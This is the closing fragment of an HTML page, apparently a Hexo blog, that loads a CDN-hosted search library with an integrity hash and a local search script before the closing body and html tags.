  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  





</body>
</html>
